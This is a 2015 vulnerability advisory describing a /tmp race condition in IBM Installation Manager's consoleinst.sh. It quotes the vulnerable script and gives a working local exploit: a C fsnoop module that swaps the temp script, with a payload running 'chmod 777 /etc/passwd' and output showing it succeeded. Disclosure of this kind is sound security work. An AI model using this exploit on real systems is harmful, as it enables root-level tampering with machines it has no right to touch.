Title: /tmp race condition in IBM Installation Manager V1.8.1 install script
Author: Larry W. Cashdollar, @_larry0
Date: 2015-10-29
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev
Vendor: IBM
Vendor Notified: 0000-00-00
Vendor Contact:
Description: IBM Installation Manager is a command line utility to install
various software packages developed by IBM.
=====> IBM Installation Manager> Password required
Credentials are required to connect to the IBM download site. Enter IBM ID
and password.
Select:
P. Provide credentials and connect
C. Cancel
Select 'P' to enter credentials and connect, or 'C' to cancel.
Forgot your IBM ID?
https://www.ibm.com/account/profile?page=forgotuid
Forgot your password?
https://www.ibm.com/account/profile?page=forgot
IBM ID help and FAQ
https://www.ibm.com/account/profile/us/en?page=regfaqhelp
-----> C
Vulnerability:
I noticed a /tmp race condition in IBM¹s installation manager software
install script
The code in consoleinst.sh is:
46 TEMP=/tmp
47 tempScript=$TEMP/consoleinst-$$.sh
48 scriptLoc=`dirname "$0"`
49 slash=`expr "$scriptLoc" : "(/)"`
50 if [ "X$slash" != "X/" ]; then
51 scriptLoc=`pwd`/$scriptLoc
52 fi
53
54 if [ "$0" != "$tempScript" ]; then
55 cp "$0" "$tempScript"
56 cd "$TEMP"
57 origScriptLoc=$scriptLoc
58 export origScriptLoc
59 exec "$tempScript" $@
60 # should not return from above exec
61 exit 1
62 fi
If you guess the pid and create the file before the installer script does
you can inject code to be executed at line 59.
This is a log of me controlling permissions of the file during installation
of the product:
[M] -rwxrwxrwx 1 larry larry 34 Thu Oct 29 21:46:10 2015
/tmp/consoleinst-9999.sh
[U] -rwxrwxrwx 1 larry larry 0 Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh
[U] -rwxrwxrwx 1 larry larry 2225 Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh
If I'm able to write to that file directly after it's modifed (inotify() for
the win) I could inject commands into that installation script.
CVEID:
OSVDB:
Exploit Code:
/*
fsnoop v3.3 module for exploitation of:
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for
pointing me
at his /tmp race condition tool l0pht-watch.
@v14dz
http://vladz.devzero.fr/
$ make ibm-console.so
/tmp/x is :
#!/bin/sh
chmod 777 /etc/passwd
$ ./fsnoop -p ibm-consoleinst.so
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb]
file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
char title[] = "** IBM Console Install Exploit **";
/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[] = "/tmp/consoleinst-HEREPID.sh";
/* Evil routines */
void payload() {
int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after
the cp command*/
mkfifo(file, 0666);
fd = open(file, O_RDONLY);
rename(file, "/tmp/a");
rename("/tmp/x", file);
}
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=156